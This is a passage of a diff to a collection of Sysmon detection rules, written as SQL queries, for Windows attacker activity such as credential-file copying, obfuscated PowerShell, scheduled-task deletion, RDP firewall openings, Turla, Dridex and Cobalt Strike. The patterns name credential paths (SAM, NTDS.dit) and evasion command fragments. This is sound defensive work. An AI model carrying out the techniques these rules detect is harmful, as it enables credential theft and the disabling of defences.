LIKE '%Shell32.dll%' ESCAPE '\\'))" ], - "filename": "proc_creation_win_susp_non_priv_reg_or_ps.yml" + "filename": "proc_creation_win_rundll32_susp_control_dll_load.yml" }, { - "title": "Suspicious Regsvr32 HTTP IP Pattern", - "id": "2dd2c217-bf68-437a-b57c-fe9fd01d5de8", + "title": "Delete Important Scheduled Task", + "id": "dbc1f800-0fe0-4bc0-9c66-292c2abe3f78", "status": "experimental", - "description": "Detects a certain command line flag combination used by regsvr32 when used to download and register a DLL from a remote address which uses HTTP (not HTTPS) and a IP address and not FQDN", - "author": "Florian Roth (Nextron Systems)", + "description": "Detects when adversaries stop services or processes by deleting their respective scheduled tasks in order to conduct data destructive activities", + "author": "Nasreddine Bencherchali (Nextron Systems)", "tags": [ - "attack.defense_evasion", - "attack.t1218.010" + "attack.impact", + "attack.t1489" ], "falsepositives": [ - "FQDNs that start with a number" + "Unlikely" ], "level": "high", "rule": [ - "SELECT * FROM logs WHERE (EventID = '1' AND Channel = 'Microsoft-Windows-Sysmon/Operational' AND CommandLine LIKE '% /s%' ESCAPE '\\' AND CommandLine LIKE '% /u%' ESCAPE '\\' AND (CommandLine LIKE '% /i:http://1%' ESCAPE '\\' OR CommandLine LIKE '% /i:http://2%' ESCAPE '\\' OR CommandLine LIKE '% /i:http://3%' ESCAPE '\\' OR CommandLine LIKE '% /i:http://4%' ESCAPE '\\' OR CommandLine LIKE '% /i:http://5%' ESCAPE '\\' OR CommandLine LIKE '% /i:http://6%' ESCAPE '\\' OR CommandLine LIKE '% /i:http://7%' ESCAPE '\\' OR CommandLine LIKE '% /i:http://8%' ESCAPE '\\' OR CommandLine LIKE '% /i:http://9%' ESCAPE '\\' OR CommandLine LIKE '% /i:https://1%' ESCAPE '\\' OR CommandLine LIKE '% /i:https://2%' ESCAPE '\\' OR CommandLine LIKE '% /i:https://3%' ESCAPE '\\' OR CommandLine LIKE '% /i:https://4%' ESCAPE '\\' OR CommandLine LIKE '% /i:https://5%' ESCAPE '\\' OR CommandLine LIKE '% /i:https://6%' ESCAPE '\\' OR CommandLine LIKE '% /i:https://7%' ESCAPE '\\' OR CommandLine LIKE '% /i:https://8%' ESCAPE '\\' OR CommandLine LIKE '% /i:https://9%' ESCAPE '\\'))" + "SELECT * FROM logs WHERE (EventID = '1' AND Channel = 'Microsoft-Windows-Sysmon/Operational' AND Image LIKE '%\\\\schtasks.exe' ESCAPE '\\' AND CommandLine LIKE '%/delete%' ESCAPE '\\' AND CommandLine LIKE '%/tn%' ESCAPE '\\' AND (CommandLine LIKE '%\\\\Windows\\\\SystemRestore\\\\SR%' ESCAPE '\\' OR CommandLine LIKE '%\\\\Windows\\\\Windows Defender\\\\%' ESCAPE '\\' OR CommandLine LIKE '%\\\\Windows\\\\BitLocker%' ESCAPE '\\' OR CommandLine LIKE '%\\\\Windows\\\\WindowsBackup\\\\%' ESCAPE '\\' OR CommandLine LIKE '%\\\\Windows\\\\WindowsUpdate\\\\%' ESCAPE '\\' OR CommandLine LIKE '%\\\\Windows\\\\UpdateOrchestrator\\\\%' ESCAPE '\\' OR CommandLine LIKE '%\\\\Windows\\\\ExploitGuard%' ESCAPE '\\'))" ], - "filename": "proc_creation_win_regsvr32_http_pattern.yml" + "filename": "proc_creation_win_schtasks_delete.yml" }, { - "title": "Potential Unquoted Service Path Reconnaissance Via Wmic.EXE", - "id": "68bcd73b-37ef-49cb-95fc-edc809730be6", - "status": "experimental", - "description": "Detects known WMI recon method to look for unquoted service paths using wmic. Often used by pentester and attacker enumeration scripts", - "author": "Nasreddine Bencherchali (Nextron Systems)", + "title": "Turla Group Commands May 2020", + "id": "9e2e51c5-c699-4794-ba5a-29f5da40ac0c", + "status": "test", + "description": "Detects commands used by Turla group as reported by ESET in May 2020", + "author": "Florian Roth (Nextron Systems)", "tags": [ + "attack.g0010", "attack.execution", - "attack.t1047" + "attack.t1059.001", + "attack.t1053.005", + "attack.t1027" ], "falsepositives": [ "Unknown" ], - "level": "high", + "level": "critical", "rule": [ - "SELECT * FROM logs WHERE ((EventID = '1' AND Channel = 'Microsoft-Windows-Sysmon/Operational') AND (OriginalFileName = 'wmic.exe' OR Image LIKE '%\\\\WMIC.exe' ESCAPE '\\') AND (CommandLine LIKE '% service get %' ESCAPE '\\' AND CommandLine LIKE '%name,displayname,pathname,startmode%' ESCAPE '\\'))" + "SELECT * FROM logs WHERE ((EventID = '1' AND Channel = 'Microsoft-Windows-Sysmon/Operational') AND ((CommandLine LIKE '%tracert -h 10 yahoo.com%' ESCAPE '\\' OR CommandLine LIKE '%.WSqmCons))|iex;%' ESCAPE '\\' OR CommandLine LIKE '%Fr`omBa`se6`4Str`ing%' ESCAPE '\\') OR (CommandLine LIKE '%net use https://docs.live.net%' ESCAPE '\\' AND CommandLine LIKE '%@aol.co.uk%' ESCAPE '\\')))" ], - "filename": "proc_creation_win_wmic_recon_unquoted_service_search.yml" + "filename": "proc_creation_win_apt_turla_comrat_may20.yml" }, { - "title": "Sysmon Driver Unloaded Via Fltmc.EXE", - "id": "4d7cda18-1b12-4e52-b45c-d28653210df8", - "status": "test", - "description": "Detects possible Sysmon filter driver unloaded via fltmc.exe", - "author": "Kirill Kiryanov, oscd.community", + "title": "Rundll32 UNC Path Execution", + "id": "5cdb711b-5740-4fb2-ba88-f7945027afac", + "status": "experimental", + "description": "Detects rundll32 execution where the DLL is located on a remote location (share)", + "author": "Nasreddine Bencherchali (Nextron Systems)", "tags": [ "attack.defense_evasion", - "attack.t1070", - "attack.t1562", - "attack.t1562.002" + "attack.execution", + "attack.t1021.002", + "attack.t1218.011" ], "falsepositives": [ "Unlikely" ], "level": "high", "rule": [ - "SELECT * FROM logs WHERE ((EventID = '1' AND Channel = 'Microsoft-Windows-Sysmon/Operational') AND (Image LIKE '%\\\\fltMC.exe' ESCAPE '\\' OR OriginalFileName = 'fltMC.exe') AND (CommandLine LIKE '%unload%' ESCAPE '\\' AND CommandLine LIKE '%sysmon%' ESCAPE '\\'))" + "SELECT * FROM logs WHERE ((EventID = '1' AND Channel = 'Microsoft-Windows-Sysmon/Operational') AND (Image LIKE '%\\\\rundll32.exe' ESCAPE '\\' OR OriginalFileName = 'RUNDLL32.EXE' OR CommandLine LIKE '%rundll32%' ESCAPE '\\') AND CommandLine LIKE '% \\\\\\\\\\*' ESCAPE '\\')" ], - "filename": "proc_creation_win_fltmc_unload_driver_sysmon.yml" + "filename": "proc_creation_win_rundll32_unc_path.yml" }, { - "title": "Regsvr32 Flags Anomaly", - "id": "b236190c-1c61-41e9-84b3-3fe03f6d76b0", + "title": "Copying Sensitive Files with Credential Data", + "id": "e7be6119-fc37-43f0-ad4f-1f3f99be2f9f", "status": "test", - "description": "Detects a flag anomaly in which regsvr32.exe uses a /i flag without using a /n flag at the same time", - "author": "Florian Roth (Nextron Systems)", + "description": "Files with well-known filenames (sensitive files with credential data) copying", + "author": "Teymur Kheirkhabarov, Daniil Yugoslavskiy, oscd.community", "tags": [ - "attack.defense_evasion", - "attack.t1218.010" + "attack.credential_access", + "attack.t1003.002", + "attack.t1003.003", + "car.2013-07-001", + "attack.s0404" ], "falsepositives": [ - "Unknown" + "Copying sensitive files for legitimate use (eg. backup) or forensic investigation by legitimate incident responder or forensic invetigator" ], "level": "high", "rule": [ - "SELECT * FROM logs WHERE ((EventID = '1' AND Channel = 'Microsoft-Windows-Sysmon/Operational') AND (Image LIKE '%\\\\regsvr32.exe' ESCAPE '\\' AND CommandLine LIKE '% /i:%' ESCAPE '\\') AND NOT (CommandLine LIKE '% /n %' ESCAPE '\\'))" + "SELECT * FROM logs WHERE ((EventID = '1' AND Channel = 'Microsoft-Windows-Sysmon/Operational') AND (((Image LIKE '%\\\\esentutl.exe' ESCAPE '\\' OR OriginalFileName LIKE '\\\\esentutl.exe' ESCAPE '\\') AND (CommandLine LIKE '%vss%' ESCAPE '\\' OR CommandLine LIKE '% /m %' ESCAPE '\\' OR CommandLine LIKE '% /y %' ESCAPE '\\')) OR (CommandLine LIKE '%\\\\windows\\\\ntds\\\\ntds.dit%' ESCAPE '\\' OR CommandLine LIKE '%\\\\config\\\\sam%' ESCAPE '\\' OR CommandLine LIKE '%\\\\config\\\\security%' ESCAPE '\\' OR CommandLine LIKE '%\\\\config\\\\system %' ESCAPE '\\' OR CommandLine LIKE '%\\\\repair\\\\sam%' ESCAPE '\\' OR CommandLine LIKE '%\\\\repair\\\\system%' ESCAPE '\\' OR CommandLine LIKE '%\\\\repair\\\\security%' ESCAPE '\\' OR CommandLine LIKE '%\\\\config\\\\RegBack\\\\sam%' ESCAPE '\\' OR CommandLine LIKE '%\\\\config\\\\RegBack\\\\system%' ESCAPE '\\' OR CommandLine LIKE '%\\\\config\\\\RegBack\\\\security%' ESCAPE '\\')))" ], - "filename": "proc_creation_win_regsvr32_flags_anomaly.yml" + "filename": "proc_creation_win_esentutl_sensitive_file_copy.yml" }, { - "title": "Suspicious PowerShell Parameter Substring", - "id": "36210e0d-5b19-485d-a087-c096088885f0", - "status": "test", - "description": "Detects suspicious PowerShell invocation with a parameter substring", - "author": "Florian Roth (Nextron Systems), Daniel Bohannon (idea), Roberto Rodriguez (Fix)", + "title": "Renamed PsExec Service Execution", + "id": "51ae86a2-e2e1-4097-ad85-c46cb6851de4", + "status": "experimental", + "description": "Detects suspicious launch of a renamed version of the PSEXESVC service with, which is not often used by legitimate administrators", + "author": "Florian Roth (Nextron Systems)", "tags": [ - "attack.execution", - "attack.t1059.001" + "attack.execution" ], "falsepositives": [ - "Unknown" + "Legitimate administrative tasks" ], "level": "high", "rule": [ - "SELECT * FROM logs WHERE (EventID = '1' AND Channel = 'Microsoft-Windows-Sysmon/Operational' AND (Image LIKE '%\\\\powershell.exe' ESCAPE '\\' OR Image LIKE '%\\\\pwsh.exe' ESCAPE '\\') AND (CommandLine LIKE '% -windowstyle h %' ESCAPE '\\' OR CommandLine LIKE '% -windowstyl h%' ESCAPE '\\' OR CommandLine LIKE '% -windowsty h%' ESCAPE '\\' OR CommandLine LIKE '% -windowst h%' ESCAPE '\\' OR CommandLine LIKE '% -windows h%' ESCAPE '\\' OR CommandLine LIKE '% -windo h%' ESCAPE '\\' OR CommandLine LIKE '% -wind h%' ESCAPE '\\' OR CommandLine LIKE '% -win h%' ESCAPE '\\' OR CommandLine LIKE '% -wi h%' ESCAPE '\\' OR CommandLine LIKE '% -win h %' ESCAPE '\\' OR CommandLine LIKE '% -win hi %' ESCAPE '\\' OR CommandLine LIKE '% -win hid %' ESCAPE '\\' OR CommandLine LIKE '% -win hidd %' ESCAPE '\\' OR CommandLine LIKE '% -win hidde %' ESCAPE '\\' OR CommandLine LIKE '% -NoPr %' ESCAPE '\\' OR CommandLine LIKE '% -NoPro %' ESCAPE '\\' OR CommandLine LIKE '% -NoProf %' ESCAPE '\\' OR CommandLine LIKE '% -NoProfi %' ESCAPE '\\' OR CommandLine LIKE '% -NoProfil %' ESCAPE '\\' OR CommandLine LIKE '% -nonin %' ESCAPE '\\' OR CommandLine LIKE '% -nonint %' ESCAPE '\\' OR CommandLine LIKE '% -noninte %' ESCAPE '\\' OR CommandLine LIKE '% -noninter %' ESCAPE '\\' OR CommandLine LIKE '% -nonintera %' ESCAPE '\\' OR CommandLine LIKE '% -noninterac %' ESCAPE '\\' OR CommandLine LIKE '% -noninteract %' ESCAPE '\\' OR CommandLine LIKE '% -noninteracti %' ESCAPE '\\' OR CommandLine LIKE '% -noninteractiv %' ESCAPE '\\' OR CommandLine LIKE '% -ec %' ESCAPE '\\' OR CommandLine LIKE '% -encodedComman %' ESCAPE '\\' OR CommandLine LIKE '% -encodedComma %' ESCAPE '\\' OR CommandLine LIKE '% -encodedComm %' ESCAPE '\\' OR CommandLine LIKE '% -encodedCom %' ESCAPE '\\' OR CommandLine LIKE '% -encodedCo %' ESCAPE '\\' OR CommandLine LIKE '% -encodedC %' ESCAPE '\\' OR CommandLine LIKE '% -encoded %' ESCAPE '\\' OR CommandLine LIKE '% -encode %' ESCAPE '\\' OR CommandLine LIKE '% -encod %' ESCAPE '\\' OR CommandLine LIKE '% -enco %' ESCAPE '\\' OR CommandLine LIKE '% -en %' ESCAPE '\\' OR CommandLine LIKE '% -executionpolic %' ESCAPE '\\' OR CommandLine LIKE '% -executionpoli %' ESCAPE '\\' OR CommandLine LIKE '% -executionpol %' ESCAPE '\\' OR CommandLine LIKE '% -executionpo %' ESCAPE '\\' OR CommandLine LIKE '% -executionp %' ESCAPE '\\' OR CommandLine LIKE '% -execution bypass%' ESCAPE '\\' OR CommandLine LIKE '% -executio bypass%' ESCAPE '\\' OR CommandLine LIKE '% -executi bypass%' ESCAPE '\\' OR CommandLine LIKE '% -execut bypass%' ESCAPE '\\' OR CommandLine LIKE '% -execu bypass%' ESCAPE '\\' OR CommandLine LIKE '% -exec bypass%' ESCAPE '\\' OR CommandLine LIKE '% -exe bypass%' ESCAPE '\\' OR CommandLine LIKE '% -ex bypass%' ESCAPE '\\' OR CommandLine LIKE '% -ep bypass%' ESCAPE '\\' OR CommandLine LIKE '% /windowstyle h %' ESCAPE '\\' OR CommandLine LIKE '% /windowstyl h%' ESCAPE '\\' OR CommandLine LIKE '% /windowsty h%' ESCAPE '\\' OR CommandLine LIKE '% /windowst h%' ESCAPE '\\' OR CommandLine LIKE '% /windows h%' ESCAPE '\\' OR CommandLine LIKE '% /windo h%' ESCAPE '\\' OR CommandLine LIKE '% /wind h%' ESCAPE '\\' OR CommandLine LIKE '% /win h%' ESCAPE '\\' OR CommandLine LIKE '% /wi h%' ESCAPE '\\' OR CommandLine LIKE '% /win h %' ESCAPE '\\' OR CommandLine LIKE '% /win hi %' ESCAPE '\\' OR CommandLine LIKE '% /win hid %' ESCAPE '\\' OR CommandLine LIKE '% /win hidd %' ESCAPE '\\' OR CommandLine LIKE '% /win hidde %' ESCAPE '\\' OR CommandLine LIKE '% /NoPr %' ESCAPE '\\' OR CommandLine LIKE '% /NoPro %' ESCAPE '\\' OR CommandLine LIKE '% /NoProf %' ESCAPE '\\' OR CommandLine LIKE '% /NoProfi %' ESCAPE '\\' OR CommandLine LIKE '% /NoProfil %' ESCAPE '\\' OR CommandLine LIKE '% /nonin %' ESCAPE '\\' OR CommandLine LIKE '% /nonint %' ESCAPE '\\' OR CommandLine LIKE '% /noninte %' ESCAPE '\\' OR CommandLine LIKE '% /noninter %' ESCAPE '\\' OR CommandLine LIKE '% /nonintera %' ESCAPE '\\' OR CommandLine LIKE '% /noninterac %' ESCAPE '\\' OR CommandLine LIKE '% /noninteract %' ESCAPE '\\' OR CommandLine LIKE '% /noninteracti %' ESCAPE '\\' OR CommandLine LIKE '% /noninteractiv %' ESCAPE '\\' OR CommandLine LIKE '% /ec %' ESCAPE '\\' OR CommandLine LIKE '% /encodedComman %' ESCAPE '\\' OR CommandLine LIKE '% /encodedComma %' ESCAPE '\\' OR CommandLine LIKE '% /encodedComm %' ESCAPE '\\' OR CommandLine LIKE '% /encodedCom %' ESCAPE '\\' OR CommandLine LIKE '% /encodedCo %' ESCAPE '\\' OR CommandLine LIKE '% /encodedC %' ESCAPE '\\' OR CommandLine LIKE '% /encoded %' ESCAPE '\\' OR CommandLine LIKE '% /encode %' ESCAPE '\\' OR CommandLine LIKE '% /encod %' ESCAPE '\\' OR CommandLine LIKE '% /enco %' ESCAPE '\\' OR CommandLine LIKE '% /en %' ESCAPE '\\' OR CommandLine LIKE '% /executionpolic %' ESCAPE '\\' OR CommandLine LIKE '% /executionpoli %' ESCAPE '\\' OR CommandLine LIKE '% /executionpol %' ESCAPE '\\' OR CommandLine LIKE '% /executionpo %' ESCAPE '\\' OR CommandLine LIKE '% /executionp %' ESCAPE '\\' OR CommandLine LIKE '% /execution bypass%' ESCAPE '\\' OR CommandLine LIKE '% /executio bypass%' ESCAPE '\\' OR CommandLine LIKE '% /executi bypass%' ESCAPE '\\' OR CommandLine LIKE '% /execut bypass%' ESCAPE '\\' OR CommandLine LIKE '% /execu bypass%' ESCAPE '\\' OR CommandLine LIKE '% /exec bypass%' ESCAPE '\\' OR CommandLine LIKE '% /exe bypass%' ESCAPE '\\' OR CommandLine LIKE '% /ex bypass%' ESCAPE '\\' OR CommandLine LIKE '% /ep bypass%' ESCAPE '\\'))" + "SELECT * FROM logs WHERE ((EventID = '1' AND Channel = 'Microsoft-Windows-Sysmon/Operational') AND OriginalFileName = 'psexesvc.exe' AND NOT (Image LIKE 'C:\\\\Windows\\\\PSEXESVC.exe' ESCAPE '\\'))" ], - "filename": "proc_creation_win_powershell_susp_parameter_variation.yml" + "filename": "proc_creation_win_renamed_sysinternals_psexec_service.yml" }, { - "title": "Suspicious File Download via CertOC.exe", - "id": "70ad0861-d1fe-491c-a45f-fa48148a300d", - "status": "experimental", - "description": "Detects when a user downloads file by using CertOC.exe", - "author": "Nasreddine Bencherchali (Nextron Systems)", + "title": "Potential Dridex Activity", + "id": "e6eb5a96-9e6f-4a18-9cdd-642cfda21c8e", + "status": "stable", + "description": "Detects potential Dridex acitvity via specific process patterns", + "author": "Florian Roth (Nextron Systems), oscd.community, Nasreddine Bencherchali (Nextron Systems)", "tags": [ - "attack.command_and_control", - "attack.t1105" + "attack.defense_evasion", + "attack.privilege_escalation", + "attack.t1055", + "attack.discovery", + "attack.t1135", + "attack.t1033" ], "falsepositives": [ - "Unknown" + "Unlikely" ], - "level": "high", + "level": "critical", "rule": [ - "SELECT * FROM logs WHERE ((EventID = '1' AND Channel = 'Microsoft-Windows-Sysmon/Operational') AND (Image LIKE '%\\\\certoc.exe' ESCAPE '\\' OR OriginalFileName = 'CertOC.exe') AND CommandLine LIKE '%-GetCACAPS%' ESCAPE '\\')" + "SELECT * FROM logs WHERE ((EventID = '1' AND Channel = 'Microsoft-Windows-Sysmon/Operational') AND ((((Image LIKE '%\\\\svchost.exe' ESCAPE '\\' AND CommandLine LIKE '%C:\\\\Users\\\\%' ESCAPE '\\' AND CommandLine LIKE '%\\\\Desktop\\\\%' ESCAPE '\\') AND NOT (ParentImage LIKE 'C:\\\\Windows\\\\System32\\\\%' ESCAPE '\\')) OR ((ParentImage LIKE '%\\\\excel.exe' ESCAPE '\\' AND Image LIKE '%\\\\regsvr32.exe' ESCAPE '\\' AND (CommandLine LIKE '% -s %' ESCAPE '\\' OR CommandLine LIKE '%\\\\AppData\\\\Local\\\\Temp\\\\%' ESCAPE '\\')) AND NOT (CommandLine LIKE '%.dll%' ESCAPE '\\'))) OR (ParentImage LIKE '%\\\\svchost.exe' ESCAPE '\\' AND ((Image LIKE '%\\\\whoami.exe' ESCAPE '\\' AND CommandLine LIKE '% /all%' ESCAPE '\\') OR ((Image LIKE '%\\\\net.exe' ESCAPE '\\' OR Image LIKE '%\\\\net1.exe' ESCAPE '\\') AND CommandLine LIKE '% view%' ESCAPE '\\')))))" ], - "filename": "proc_creation_win_lolbin_certoc_download.yml" + "filename": "proc_creation_win_malware_dridex.yml" }, { - "title": "Suspicious Schtasks From Env Var Folder", - "id": "81325ce1-be01-4250-944f-b4789644556f", - "status": "experimental", - "description": "Detects Schtask creations that point to a suspicious folder or an environment variable often used by malware", - "author": "Florian Roth (Nextron Systems)", + "title": "RDP Connection Allowed Via Netsh.EXE", + "id": "01aeb693-138d-49d2-9403-c4f52d7d3d62", + "status": "test", + "description": "Detects usage of the netsh command to open and allow connections to port 3389 (RDP). As seen used by Sarwent Malware", + "author": "Sander Wiebing", "tags": [ - "attack.execution", - "attack.t1053.005" + "attack.defense_evasion", + "attack.t1562.004" ], "falsepositives": [ - "Benign scheduled tasks creations or executions that happen often during software installations", - "Software that uses the AppData folder and scheduled tasks to update the software in the AppData folders" + "Legitimate administration activity" ], "level": "high", "rule": [ - "SELECT * FROM logs WHERE ((EventID = '1' AND Channel = 'Microsoft-Windows-Sysmon/Operational') AND ((Image LIKE '%\\\\schtasks.exe' ESCAPE '\\' AND CommandLine LIKE '% /create %' ESCAPE '\\' AND (CommandLine LIKE '%\\%AppData\\%%' ESCAPE '\\' OR CommandLine LIKE '%\\\\AppData\\\\Local\\\\%' ESCAPE '\\' OR CommandLine LIKE '%\\\\AppData\\\\Roaming\\\\%' ESCAPE '\\' OR CommandLine LIKE '%\\%Public\\%%' ESCAPE '\\' OR CommandLine LIKE '%\\\\Users\\\\Public%' ESCAPE '\\' OR CommandLine LIKE '%C:\\\\Windows\\\\Temp%' ESCAPE '\\' OR CommandLine LIKE '%C:\\\\Perflogs%' ESCAPE '\\')) OR (ParentCommandLine LIKE '%\\\\svchost.exe -k netsvcs -p -s Schedule' ESCAPE '\\' AND (CommandLine LIKE '%\\%Public\\%%' ESCAPE '\\' OR CommandLine LIKE '%\\\\Users\\\\Public%' ESCAPE '\\' OR CommandLine LIKE '%C:\\\\Windows\\\\Temp%' ESCAPE '\\' OR CommandLine LIKE '%C:\\\\Perflogs%' ESCAPE '\\'))) AND NOT (((CommandLine LIKE '%update\\_task.xml%' ESCAPE '\\' OR CommandLine LIKE '%/Create /TN TVInstallRestore /TR%' ESCAPE '\\') OR ParentCommandLine LIKE '%unattended.ini%' ESCAPE '\\') OR (CommandLine LIKE '%/Create /Xml \"C:\\\\Users\\\\%' ESCAPE '\\' AND CommandLine LIKE '%\\\\AppData\\\\Local\\\\Temp\\\\.CR.%' ESCAPE '\\' AND CommandLine LIKE '%Avira\\_Security\\_Installation.xml%' ESCAPE '\\') OR (CommandLine LIKE '%/Create /F /TN%' ESCAPE '\\' AND CommandLine LIKE '%/Xml %' ESCAPE '\\' AND CommandLine LIKE '%\\\\AppData\\\\Local\\\\Temp\\\\is-%' ESCAPE '\\' AND CommandLine LIKE '%Avira\\_%' ESCAPE '\\' AND (CommandLine LIKE '%.tmp\\\\UpdateFallbackTask.xml%' ESCAPE '\\' OR CommandLine LIKE '%.tmp\\\\WatchdogServiceControlManagerTimeout.xml%' ESCAPE '\\' OR CommandLine LIKE '%.tmp\\\\SystrayAutostart.xml%' ESCAPE '\\' OR CommandLine LIKE '%.tmp\\\\MaintenanceTask.xml%' ESCAPE '\\')) OR (CommandLine LIKE '%\\\\AppData\\\\Local\\\\Temp\\\\%' ESCAPE '\\' AND CommandLine LIKE '%/Create /TN \"klcp\\_update\" /XML %' ESCAPE '\\' AND CommandLine LIKE '%\\\\klcp\\_update\\_task.xml%' ESCAPE '\\')))" + "SELECT * FROM logs WHERE ((EventID = '1' AND Channel = 'Microsoft-Windows-Sysmon/Operational') AND (Image LIKE '%\\\\netsh.exe' ESCAPE '\\' OR OriginalFileName = 'netsh.exe') AND (CommandLine LIKE '%firewall %' ESCAPE '\\' AND CommandLine LIKE '%add %' ESCAPE '\\' AND CommandLine LIKE '%tcp %' ESCAPE '\\' AND CommandLine LIKE '%3389%' ESCAPE '\\') AND (CommandLine LIKE '%portopening%' ESCAPE '\\' OR (CommandLine LIKE '%advfirewall%' ESCAPE '\\' AND CommandLine LIKE '%rule%' ESCAPE '\\' AND CommandLine LIKE '%allow%' ESCAPE '\\')))" ], - "filename": "proc_creation_win_schtasks_env_folder.yml" + "filename": "proc_creation_win_netsh_fw_allow_rdp.yml" }, { - "title": "Suspicious Reconnaissance Activity Via GatherNetworkInfo.VBS", - "id": "07aa184a-870d-413d-893a-157f317f6f58", + "title": "PowerShell Base64 Encoded Invoke Keyword", + "id": "6385697e-9f1b-40bd-8817-f4a91f40508e", "status": "test", - "description": "Detects execution of the built-in script located in \"C:\\Windows\\System32\\gatherNetworkInfo.vbs\". Which can be used to gather information about the target machine", - "author": "Nasreddine Bencherchali (Nextron Systems)", + "description": "Detects UTF-8 and UTF-16 Base64 encoded powershell 'Invoke-' calls", + "author": "pH-T (Nextron Systems), Harjot Singh, @cyb3rjy0t", "tags": [ - "attack.discovery", "attack.execution", - "attack.t1615", - "attack.t1059.005" + "attack.t1059.001", + "attack.defense_evasion", + "attack.t1027" ], "falsepositives": [ "Unknown" ], "level": "high", "rule": [ - "SELECT * FROM logs WHERE ((EventID = '1' AND Channel = 'Microsoft-Windows-Sysmon/Operational') AND CommandLine LIKE '%gatherNetworkInfo.vbs%' ESCAPE '\\' AND NOT ((Image LIKE '%\\\\cscript.exe' ESCAPE '\\' OR Image LIKE '%\\\\wscript.exe' ESCAPE '\\')))" + "SELECT * FROM logs WHERE ((EventID = '1' AND Channel = 'Microsoft-Windows-Sysmon/Operational') AND ((Image LIKE '%\\\\powershell.exe' ESCAPE '\\' OR Image LIKE '%\\\\pwsh.exe' ESCAPE '\\') OR OriginalFileName IN ('PowerShell.EXE', 'pwsh.dll')) AND CommandLine LIKE '% -e%' ESCAPE '\\' AND (CommandLine LIKE '%SQBuAHYAbwBrAGUALQ%' ESCAPE '\\' OR CommandLine LIKE '%kAbgB2AG8AawBlAC0A%' ESCAPE '\\' OR CommandLine LIKE '%JAG4AdgBvAGsAZQAtA%' ESCAPE '\\' OR CommandLine LIKE '%SW52b2tlL%' ESCAPE '\\' OR CommandLine LIKE '%ludm9rZS%' ESCAPE '\\' OR CommandLine LIKE '%JbnZva2Ut%' ESCAPE '\\'))" ], - "filename": "proc_creation_win_susp_gather_network_info_execution.yml" + "filename": "proc_creation_win_powershell_base64_invoke.yml" }, { - "title": "Suspicious RazerInstaller Explorer Subprocess", - "id": "a4eaf250-7dc1-4842-862a-5e71cd59a167", - "status": "test", - "description": "Detects a explorer.exe sub process of the RazerInstaller software which can be invoked from the installer to select a different installation folder but can also be exploited to escalate privileges to LOCAL SYSTEM", - "author": "Florian Roth (Nextron Systems), Maxime Thiebaut", + "title": "Suspect Svchost Activity", + "id": "16c37b52-b141-42a5-a3ea-bbe098444397", + "status": "experimental", + "description": "It is extremely abnormal for svchost.exe to spawn without any CLI arguments and is normally observed when a malicious process spawns the process and injects code into the process memory space.", + "author": "David Burkett, @signalblur", "tags": [ + "attack.defense_evasion", "attack.privilege_escalation", - "attack.t1553" + "attack.t1055" ], "falsepositives": [ - "User selecting a different installation folder (check for other sub processes of this explorer.exe process)" + "Rpcnet.exe / rpcnetp.exe which is a lojack style software. https://www.blackhat.com/docs/us-14/materials/us-14-Kamlyuk-Kamluk-Computrace-Backdoor-Revisited.pdf" ], "level": "high", "rule": [ - "SELECT * FROM logs WHERE ((EventID = '1' AND Channel = 'Microsoft-Windows-Sysmon/Operational') AND (ParentImage LIKE '%\\\\RazerInstaller.exe' ESCAPE '\\' AND IntegrityLevel = 'System') AND NOT (Image LIKE 'C:\\\\Windows\\\\Installer\\\\Razer\\\\Installer\\\\%' ESCAPE '\\'))" + "SELECT * FROM logs WHERE ((EventID = '1' AND Channel = 'Microsoft-Windows-Sysmon/Operational') AND (CommandLine LIKE '%svchost.exe' ESCAPE '\\' AND Image LIKE '%\\\\svchost.exe' ESCAPE '\\') AND NOT ((ParentImage LIKE '%\\\\rpcnet.exe' ESCAPE '\\' OR ParentImage LIKE '%\\\\rpcnetp.exe' ESCAPE '\\') OR CommandLine = ''))" ], - "filename": "proc_creation_win_exploit_other_razorinstaller_lpe.yml" + "filename": "proc_creation_win_svchost_execution_with_no_cli_flags.yml" }, { - "title": "Potential Meterpreter/CobaltStrike Activity", - "id": "15619216-e993-4721-b590-4c520615a67d", - "status": "test", - "description": "Detects the use of getsystem Meterpreter/Cobalt Strike command by detecting a specific service starting", - "author": "Teymur Kheirkhabarov, Ecco, Florian Roth", + "title": "HackTool - Certify Execution", + "id": "762f2482-ff21-4970-8939-0aa317a886bb", + "status": "experimental", + "description": "Detects Certify a tool for Active Directory certificate abuse based on PE metadata characteristics and common command line arguments.", + "author": "pH-T (Nextron Systems)", "tags": [ - "attack.privilege_escalation", - "attack.t1134.001", - "attack.t1134.002" + "attack.discovery", + "attack.credential_access", + "attack.t1649" ], "falsepositives": [ - "Commandlines containing components like cmd accidentally", - "Jobs and services started with cmd" + "Unknown" ], "level": "high", "rule": [ - "SELECT * FROM logs WHERE ((EventID = '1' AND Channel = 'Microsoft-Windows-Sysmon/Operational') AND (ParentImage LIKE '%\\\\services.exe' ESCAPE '\\' AND ((CommandLine LIKE '%/c%' ESCAPE '\\' AND CommandLine LIKE '%echo%' ESCAPE '\\' AND CommandLine LIKE '%\\\\pipe\\\\%' ESCAPE '\\' AND (CommandLine LIKE '%cmd%' ESCAPE '\\' OR CommandLine LIKE '%\\%COMSPEC\\%%' ESCAPE '\\')) OR (CommandLine LIKE '%rundll32%' ESCAPE '\\' AND CommandLine LIKE '%.dll,a%' ESCAPE '\\' AND CommandLine LIKE '%/p:%' ESCAPE '\\'))) AND NOT ((CommandLine LIKE '%MpCmdRun%' ESCAPE '\\')))" + "SELECT * FROM logs WHERE ((EventID = '1' AND Channel = 'Microsoft-Windows-Sysmon/Operational') AND ((Image LIKE '%\\\\Certify.exe' ESCAPE '\\' OR OriginalFileName = 'Certify.exe' OR Description LIKE '%Certify%' ESCAPE '\\') OR ((CommandLine LIKE '%.exe cas %' ESCAPE '\\' OR CommandLine LIKE '%.exe find %' ESCAPE '\\' OR CommandLine LIKE '%.exe pkiobjects %' ESCAPE '\\' OR CommandLine LIKE '%.exe request %' ESCAPE '\\' OR CommandLine LIKE '%.exe download %' ESCAPE '\\') AND (CommandLine LIKE '% /vulnerable%' ESCAPE '\\' OR CommandLine LIKE '% /template:%' ESCAPE '\\' OR CommandLine LIKE '% /altname:%' ESCAPE '\\' OR CommandLine LIKE '% /domain:%' ESCAPE '\\' OR CommandLine LIKE '% /path:%' ESCAPE '\\' OR CommandLine LIKE '% /ca:%' ESCAPE '\\'))))" ], - "filename": "proc_creation_win_hktl_meterpreter_getsystem.yml" + "filename": "proc_creation_win_hktl_certify.yml" }, { - "title": "CobaltStrike Load by Rundll32", - "id": "ae9c6a7c-9521-42a6-915e-5aaa8689d529", + "title": "Curl Download And Execute Combination", + "id": 